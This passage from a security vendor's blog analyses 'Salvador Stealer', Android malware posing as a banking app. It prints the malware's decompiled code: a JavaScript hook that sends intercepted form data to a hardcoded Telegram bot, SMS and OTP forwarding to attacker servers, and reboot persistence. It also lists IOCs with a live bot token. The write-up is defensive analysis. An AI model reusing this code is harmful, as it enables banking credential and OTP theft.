pre-wrap\">https%3A%2F%2Fgchq.github.io%2FCyberChef%2F%23recipe%3DFrom_Hex%28%27Auto%27%29XOR%28%257B%27option%27%3A%27Latin1%27%2C%27string%27%3A%27npmanager%27%257D%2C%27Standard%27%2Cfalse%29%26input%3DMEYxRTA5MTMwMTA4MDM0QjAyMUMxRjFCMDgwQTA0MTU0QjI2MEIxQzA4MTEwNjBFMDkxQzVDM0QzRDNFM0UzQzI0MjQyMDNCMzgzNTI5<\/code><\/pre>\n\n\n\n<p>To analyze the rest of the APK effectively, we\u2019ll need to decode all encrypted strings automatically. Here\u2019s a Python script that recursively scans all .java files, decrypts any encrypted strings using the same XOR method, and writes the result to a _decoded.java file.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap\">import re \nimport os \n \ndef decode_npstringfog(encoded: str, key: str = \"npmanager\") -&gt; str: \n    b = bytearray() \n    for i in range(0, len(encoded), 2): \n        b.append(int(encoded&#91;i:i+2], 16)) \n    key_bytes = key.encode() \n    return bytearray((b&#91;i] ^ key_bytes&#91;i % len(key_bytes)]) for i in range(len(b))).decode(errors=\"replace\") \n \ndef decode_and_save(filepath: str): \n    with open(filepath, \"r\", encoding=\"utf-8\") as f: \n        content = f.read() \n \n    # Find all NPStringFog.decode(\"...\") \n    pattern = re.compile(r'NPStringFog\\.decode\\(\"(&#91;0-9A-F]+)\"\\)') \n    if not pattern.search(content): \n        return \n \n    decoded_content = pattern.sub(lambda m: f'\"{decode_npstringfog(m.group(1))}\"', content) \n \n    outpath = filepath.replace(\".java\", \"_decoded.java\") \n    with open(outpath, \"w\", encoding=\"utf-8\") as f: \n        f.write(decoded_content) \n    print(f\"&#91;+] Decoded file written: {outpath}\") \n \ndef walk_and_decode(base_dir: str = \".\"): \n    for root, _, files in os.walk(base_dir): \n        for file in files: \n            if file.endswith(\".java\"): \n                full_path = os.path.join(root, file) \n                decode_and_save(full_path) \n \nwalk_and_decode() <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">WebView-Based Phishing Page&nbsp;<\/h3>\n\n\n\n<p>Now that we\u2019ve decoded the files, we can begin our deeper analysis of base.apk. &nbsp;<\/p>\n\n\n\n<p>Let\u2019s start with Helene.java, which acts as the main activity of the application. It loads a webpage and handles runtime permissions.&nbsp;<br>&nbsp;<br>Upon launch, it checks for the necessary Android permissions and ensures there is an active internet connection.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@Override \n\npublic void onCreate(Bundle savedInstanceState) { \n\n    super.onCreate(savedInstanceState); \n\n    setContentView(R.layout.activity_ffff); \n\n    changeStatusBarColor(\"#4CAF50\"); \n\n    ... \n\n    if (checkPermissions(this)) { \n\n        WebView webView = (WebView) findViewById(R.id.randomWebView); \n\n        setupWebView(this, webView); \n\n        initiateForegroundServiceIfRequired(); \n\n    } else { \n\n        requestAppPermissions(); \n\n    } \n\n} \n<\/code><\/pre>\n\n\n\n<p>This method sets up the UI, verifies permissions, and initializes a WebView. The setupWebView() method enables JavaScript and DOM storage, then loads the phishing page:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>public void setupWebView(Context context, final WebView webView) { \n\n    WebSettings settings = webView.getSettings(); \n\n    settings.setJavaScriptEnabled(true); \n\n    settings.setDomStorageEnabled(true); \n\n    ... \n\n    webView.loadUrl(\"https:\/\/t15.muletipushpa.cloud\/page\/\"); \n\n} <\/code><\/pre>\n\n\n\n<p>Once the page finishes loading, a malicious JavaScript payload is injected:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap\">String jsCode = \"eval(decodeURIComponent('%28%66%75%6e%63%74%69.....'));\"; <\/code><\/pre>\n\n\n\n<p>After decoding, the JavaScript reveals that it hooks into&nbsp; XMLHttpRequest.prototype.send, which is commonly used by web apps to send data (e.g., login credentials or session info).&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(function() { \n\n    const originalSend = XMLHttpRequest.prototype.send; \n\n    XMLHttpRequest.prototype.send = function(data) { \n\n        try { \n\n            const botToken = \"7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE\"; \n\n            const chatId = \"-1002480016557\"; \n\n            const telegramUrl = `https:\/\/api.telegram.org\/bot${botToken}\/sendMessage`; \n\n            const telegramMessage = { \n\n                chat_id: chatId, \n\n                text: `Intercepted Data Sent:\\n${data}` \n\n            }; \n\n            fetch(telegramUrl, { \n\n                method: 'POST', \n\n                headers: { \n\n                    'Content-Type': 'application\/json' \n\n                }, \n\n                body: JSON.stringify(telegramMessage) \n\n            }); \n\n        } catch (e) { \n\n            console.error(\"Error sending to Telegram:\", e); \n\n        } \n\n        return originalSend.apply(this, arguments); \n\n    }; \n\n})();<\/code><\/pre>\n\n\n\n<p>It intercepts all AJAX\/XHR requests made from the loaded phishing page. These intercepted payloads are sent to a hardcoded Telegram chat via the Bot API.&nbsp;<\/p>\n\n\n\n<!-- CTA Split START -->\n<div class=\"cta-split\">\n<div class=\"cta__split-left\">\n\n<!-- Image -->\n<img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/mcusercontent.com\/663b94f19348582a8dc323efe\/images\/0d88188b-3e89-2314-5a60-cb87e8077326.png\" alt=\"Learn to analyze malware in a sandbox\" class=\"cta__split-icon\" \/>\n<\/div>\n\n<div class=\"cta__split-right\">\n<div>\n\n<!-- Heading -->\n<h3 class=\"cta__split-heading\"><br>Learn to analyze cyber threats<\/h3>\n\n<!-- Text -->\n<p class=\"cta__split-text\">\nSee a detailed guide to using ANY.RUN&#8217;s <span class=\"highlight\">Interactive Sandbox<\/span> for malware and phishing analysis\n<br \/>\n<br \/>\n<\/p>\n<\/div>\n<!-- CTA Link -->\n<a target=\"_blank\" rel=\"noopener\" id=\"article-banner-split\" href=\"https:\/\/any.run\/cybersecurity-blog\/malware-analysis-in-a-sandbox\/\"><div class=\"cta__split-link\">Read full guide<\/div><\/a>\n<\/div>\n<\/div>\n<!-- CTA Split END -->\n<!-- CTA Split Styles START -->\n<style>\n.cta-split {\noverflow: hidden;\nmargin: 3rem 0;\ndisplay: grid;\njustify-items: center;\nborder-radius: 0.5rem;\nwidth: 100%;\nmin-height: 25rem;\ngrid-template-columns: repeat(2, 1fr);\nborder: 1px solid rgba(75, 174, 227, 0.32);\nfont-family: 'Catamaran Bold';\n}\n\n.cta__split-left {\ndisplay: flex;\nalign-items: center;\njustify-content: center;\nheight: 100%;\nwidth: 100%;\nbackground-color: #161c59;\nbackground-position: center center;\nbackground: rgba(32, 168, 241, 0.1);\n}\n\n.cta__split-icon { \nwidth: 100%;\nheight: auto;\nobject-fit: contain;\nmax-width: 100%;\n}\n\n.cta__split-right {\ndisplay: flex;\nflex-direction: column;\njustify-content: space-between;\npadding: 2rem;\n}\n\n.cta__split-heading { font-size: 1.5rem; }\n\n.cta__split-text {\nmargin-top: 1rem;\nfont-family: Lato, Roboto, sans-serif;\n}\n\n.cta__split-link {\npadding: 0.5rem 1rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: white;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\ndisplay: block;\nz-index: 1000;\nposition: relative;\ncursor: pointer !important;\n}\n\n.cta__split-link:hover {\nbackground-color: #68CBFF;\ncolor: white;\ncursor: pointer;\n}\n\n.highlight { color: #ea2526;}\n\n\n\/* Mobile styles START *\/\n@media only screen and (max-width: 768px) {\n\n.cta-split {\ngrid-template-columns: 1fr;\nmin-height: auto;\n}\n\n.cta__split-left {\nheight: auto;\nmin-height: 10rem;\n}\n\n\n.cta__split-left, .cta__split-right {\nheight: auto;\n}\n\n.cta__split-heading { font-size: 1.2rem; }\n\n.cta__split-text { font-size: 1rem; }\n.cta__split-icon {\nmax-height: auto;\nobject-fit: cover;\n}\n\n}\n\/* Mobile styles END *\/\n<\/style>\n<!-- CTA Split Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">SMS Interception &amp; OTP Theft&nbsp;<\/h3>\n\n\n\n<p>After loading the phishing WebView it requests several Android permissions, including: &nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>RECEIVE_SMS&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SEND_SMS&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>READ_SMS&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>INTERNET &nbsp;<\/li>\n<\/ul>\n\n\n\n<p>These permissions are essential for the malware\u2019s goals\u2014intercepting one-time passwords (OTPs) and forwarding them.&nbsp;<\/p>\n\n\n\n<p>Once the permissions are granted, the initiateForegroundServiceIfRequired() method is called, launching the Fitzgerald service.&nbsp;<br>This foreground service creates a fake notification (&#8220;Customer support&#8221;) and more importantly, it immediately registers a broadcast receiver to intercept incoming SMS:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>this.smsReceiver = new Earnestine(); \n\nregisterReceiver(this.smsReceiver, new IntentFilter(\"android.provider.Telephony.SMS_RECEIVED\")); <\/code><\/pre>\n\n\n\n<p>This is the real starting point of the OTP interception process. Every incoming message is captured and parsed by Earnestine. From the PDU, the malware extracts the message body, sender\u2019s number, and timestamp:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SmsMessage sms = SmsMessage.createFromPdu((byte&#91;]) pdu, \"3gpp\"); \n\nString messageBody = sms.getMessageBody(); \n\nString senderId = sms.getOriginatingAddress(); \n\nlong timestamp = sms.getTimestampMillis();<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Data Exfiltration Methods<\/h3>\n\n\n\n<p>The message is then stored using a map that groups multipart SMS messages together. Once it decides the message is complete and ready for exfiltration, the malware uses two separate mechanisms to forward it to the attacker:&nbsp;<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li><strong>Dynamic SMS forwarding: <\/strong>&nbsp;<\/li>\n<\/ol>\n\n\n\n<p>Inside a function named Bradford(), the malware contacts a remote server to retrieve a forwarding number.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>String urlString = \"https:\/\/t15.muletipushpa.cloud\/json\/number.php\"; \n\n... \n\nString phoneNumber = jsonObject.optString(\"number\", \"\"); \n\nEarnestine.this.sendSMS(messageBody, phoneNumber); <\/code><\/pre>\n\n\n\n<p>This number is set by the attacker and can be changed at any time. If the server responds with enabled: true, the message is forwarded to that number using the standard SmsManager.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smsManager.sendTextMessage(phoneNumber, null, messageBody, null, null); <\/code><\/pre>\n\n\n\n<p>If the number is not available or the response is malformed, the malware will fall back to a previously saved one stored in SharedPreferences. It uses the key &#8220;Salvador&#8221; as the name of the preference file, and &#8220;forwardingNumber&#8221; as the key to retrieve the last known destination. &nbsp;<\/p>\n\n\n\n<p>This use of &#8220;Salvador&#8221; as a unique identifier for internal storage is what led us to name this malware Salvador Stealer:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SharedPreferences sharedPreferences = context.getSharedPreferences(\"Salvador\", 0); \n\nString savedPhoneNumber = sharedPreferences.getString(\"forwardingNumber\", \"\"); <\/code><\/pre>\n\n\n\n<p>This suggests the malware is designed to persist attacker-supplied configuration data between sessions, allowing it to continue exfiltrating OTPs even when the server is unreachable or temporarily offline.&nbsp;<\/p>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li><strong>HTTP-Based Fallback<\/strong>&nbsp;<\/li>\n<\/ol>\n\n\n\n<p>Through another method called Randall(), the malware constructs a JSON payload containing the sender ID, message content, and timestamp:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>jsonData.put(\"sender_id\", senderId); \n\njsonData.put(\"message\", messageBody); \n\njsonData.put(\"timestamp\", timestamp); <\/code><\/pre>\n\n\n\n<p>This data is then sent in a POST request to another hardcoded endpoint:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>String apiUrl = \"https:\/\/t15.muletipushpa.cloud\/post.php\";<\/code><\/pre>\n\n\n\n<p>By using both SMS and HTTP as parallel delivery channels, the malware increases its chances of reliably delivering OTPs or any sensitive codes it intercepts, ensuring the attacker receives them regardless of connectivity issues or SMS blocking.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Persistence Mechanism&nbsp;<\/h3>\n\n\n\n<p>Even if the user or system tries to terminate the app\u2019s background service, the malware is programmed to automatically restart it. When the Fitzgerald service is killed or swiped away, it immediately schedules a recovery task using Android\u2019s WorkManager:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>WorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class) \n\n    .setInitialDelay(1L, TimeUnit.SECONDS) \n\n    .build(); \n\nWorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork); <\/code><\/pre>\n\n\n\n<p>The scheduled worker points to the Mauricio class. Inside, it simply relaunches Fitzgerald:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Intent Pasquale = new Intent(getApplicationContext(), Fitzgerald.class); \n\ngetApplicationContext().startForegroundService(Pasquale); <\/code><\/pre>\n\n\n\n<p>This way, even if the user tries to shut the app down from the task manager or system settings, the malware silently revives itself within seconds.&nbsp;<\/p>\n\n\n\n<p>If the device itself is rebooted, the malware still survives. A separate class named Ellsworth is responsible for this behavior. It listens for the system-wide BOOT_COMPLETED broadcast and triggers the Fitzgerald service again:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>public class Ellsworth extends BroadcastReceiver { \n\n    @Override \n\n    public void onReceive(Context context, Intent intent) { \n\n        if (intent.getAction().equals(\"android.intent.action.BOOT_COMPLETED\")) { \n\n            Intent serviceIntent = new Intent(context, (Class&lt;?&gt;) Fitzgerald.class); \n\n            context.startService(serviceIntent); \n\n        } \n\n    } \n\n} <\/code><\/pre>\n\n\n\n<p>This guarantees that the malware regains control after reboot and resumes intercepting SMS messages immediately.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Interesting Findings&nbsp;<\/h2>\n\n\n\n<p>During our analysis, we identified that the fake banking interface used by Salvador Stealer is actually a&nbsp;phishing websiteembedded inside the Android application.&nbsp;<br>&nbsp;<br>The phishing page can be accessed directly at:&nbsp;<br>\ud83d\udc49 hxxxs:\/\/t15[.]muletipushpa[.]cloud\/page\/start[.]php&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"506\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-1024x506.png\" alt=\"\" class=\"wp-image-12466\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-1024x506.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-300x148.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-768x379.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-1536x759.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-370x183.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-270x133.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-740x366.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22.png 1903w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Phishing page that encourages victims to share their personal data<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>We also detected another phishing page hosted on a different subdomain, following a pattern with incremental digits\u2014from&nbsp;t01.*&nbsp;up to&nbsp;t15.* &nbsp;<\/p>\n\n\n\n<p>At the time of writing, the attacker has also left the admin panel accessible to anyone.&nbsp;<\/p>\n\n\n\n<p>The admin login page is publicly available at:&nbsp;<br>\ud83d\udc49 hxxxs:\/\/t15[.]muletipushpa[.]cloud\/admin\/login[.]php&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"501\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-1024x501.png\" alt=\"\" class=\"wp-image-12468\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-1024x501.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-300x147.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-768x376.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-1536x752.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-370x181.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-270x132.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-740x362.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16.png 1919w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Admin login page available to everyone<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Brute-forcing the admin login panel reveals a message prompting the user to contact a WhatsApp number, likely belonging to the developer of this phishing malware.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hxxxs:\/\/api&#91;.]whatsapp&#91;.]com\/send\/?phone=916306285085&amp;text&amp;type=phone_number&amp;app_absent=0<\/code><\/pre>\n\n\n\n<p>Exposed phone number: +916306285085&nbsp;<br>This suggests that the attacker is either based in India or using an Indian phone number as a disguise.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Salvador Threat Impact&nbsp;<\/h2>\n\n\n\n<p>The Salvador Stealer campaign poses a serious risk to both individuals and organizations:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>For end users:<\/strong>&nbsp;Victims risk financial fraud, identity theft, and unauthorized access to their banking accounts.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>For financial institutions:<\/strong>&nbsp;This malware undermines customer trust, increases fraud cases, and may lead to reputational damage.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>For security teams:<\/strong>&nbsp;Salvador Stealer\u2019s layered infection chain, real-time data exfiltration, and SMS interception tactics make detection difficult without advanced analysis tools.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>For mobile ecosystem:<\/strong>&nbsp;The use of legitimate-looking banking apps and embedded phishing pages highlights the growing trend of sophisticated Android-based social engineering attacks.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion&nbsp;<\/h2>\n\n\n\n<p>The analysis of Salvador Stealer reveals how modern Android malware combines phishing, credential theft, and advanced persistence techniques to compromise sensitive financial data. Threats like this highlight the increasing complexity of mobile malware and the growing challenge of detecting and stopping them before damage is done.&nbsp;<\/p>\n\n\n\n<p>By analyzing Salvador Stealer in real time using&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/android-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Android sandbox<\/a>, we were able to fully map its behavior, uncover its infrastructure, and extract key indicators in just minutes\u2014something that would otherwise require hours of manual static analysis.&nbsp;<\/p>\n\n\n\n<p>Here\u2019s how analysis like this can bring value:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Faster threat detection:<\/strong>&nbsp;Quickly identify malicious behaviors and communication patterns.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Complete visibility:<\/strong>&nbsp;Observe real-time actions of mobile malware, including data exfiltration and persistence tactics.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Reduced investigation time:<\/strong>&nbsp;Automate and accelerate the technical analysis process.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Improved response:<\/strong>&nbsp;Provide clear, actionable Indicators of Compromise (IOCs) for threat hunting and incident response.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Enhanced threat intelligence:<\/strong>&nbsp;Expose attacker infrastructure and techniques that may be used in future campaigns.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Effective defense starts with better visibility. Tools like ANY.RUN\u2019s sandbox make real-time threat analysis actionable and accessible to everyone.&nbsp;<\/p>\n\n\n\n<p><a href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoregistration#register\/\" target=\"_blank\" rel=\"noreferrer noopener\">Try ANY.RUN\u2019s Android Sandbox now<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Indicators of Compromise (IOC)<\/strong>&nbsp;<\/h2>\n\n\n\n<p>\ud83d\udd17 Phishing URL:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>t01[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t02[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t03[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t04[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t05[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t06[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t08[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t10[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t11[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t12[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t13[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t14[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>t15[.]muletipushpa[.]cloud&nbsp;<\/li>\n\n\n\n<li>ta01[.]muletipushpa[.]cloud&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>\ud83d\udce1 C2 Server (Telegram Bot):&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>hxxs:\/\/api[.]telegram[.]org\/bot7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>\ud83d\udd0d File Hashes:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>INDUSLND_BANK_E_KYC.apk&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>SHA256: 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Base.apk&nbsp;<br>SHA256: &nbsp;<br>7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Threat actor\u2019s phone number:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>+916306285085&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN<\/h2>\n\n\n\n<p><a href=\"http:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a> helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, <a href=\"https:\/\/any.run\/cybersecurity-blog\/introducing-any-run-threat-intelligence-lookup\/\" target=\"_blank\" rel=\"noreferrer noopener\">TI Lookup<\/a>, <a href=\"https:\/\/any.run\/cybersecurity-blog\/yara-search\/\" target=\"_blank\" rel=\"noreferrer noopener\">YARA Search<\/a>, and <a href=\"https:\/\/any.run\/cybersecurity-blog\/threat-intelligence-feeds\/\" target=\"_blank\" rel=\"noreferrer noopener\">Feeds<\/a>, help you find IOCs or files to learn more about the threats and respond to incidents faster.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this report, we examine an Android malware sample recently collected and analyzed by our team. This malware masquerades as a banking application and is built to steal sensitive user information. During the analysis, we came across internal references to &#8220;Salvador,&#8221; so we decided to name it Salvador Stealer.&nbsp; Real-time visibility into mobile malware behavior [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":12493,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"[]"},"categories":[8],"tags":[57,10,15,34,40],"class_list":["post-12413","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-malware","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Salvador Stealer: Analysis of New Mobile Banking Malware<\/title>\n<meta name=\"description\" content=\"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking apps.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Achmad Adhikara\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\"},\"author\":{\"name\":\"Achmad Adhikara\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs\",\"datePublished\":\"2025-04-01T10:50:42+00:00\",\"dateModified\":\"2025-04-02T05:49:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\"},\"wordCount\":2592,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"malware\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\",\"name\":\"Salvador Stealer: Analysis of New Mobile Banking Malware\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2025-04-01T10:50:42+00:00\",\"dateModified\":\"2025-04-02T05:49:54+00:00\",\"description\":\"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking apps.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 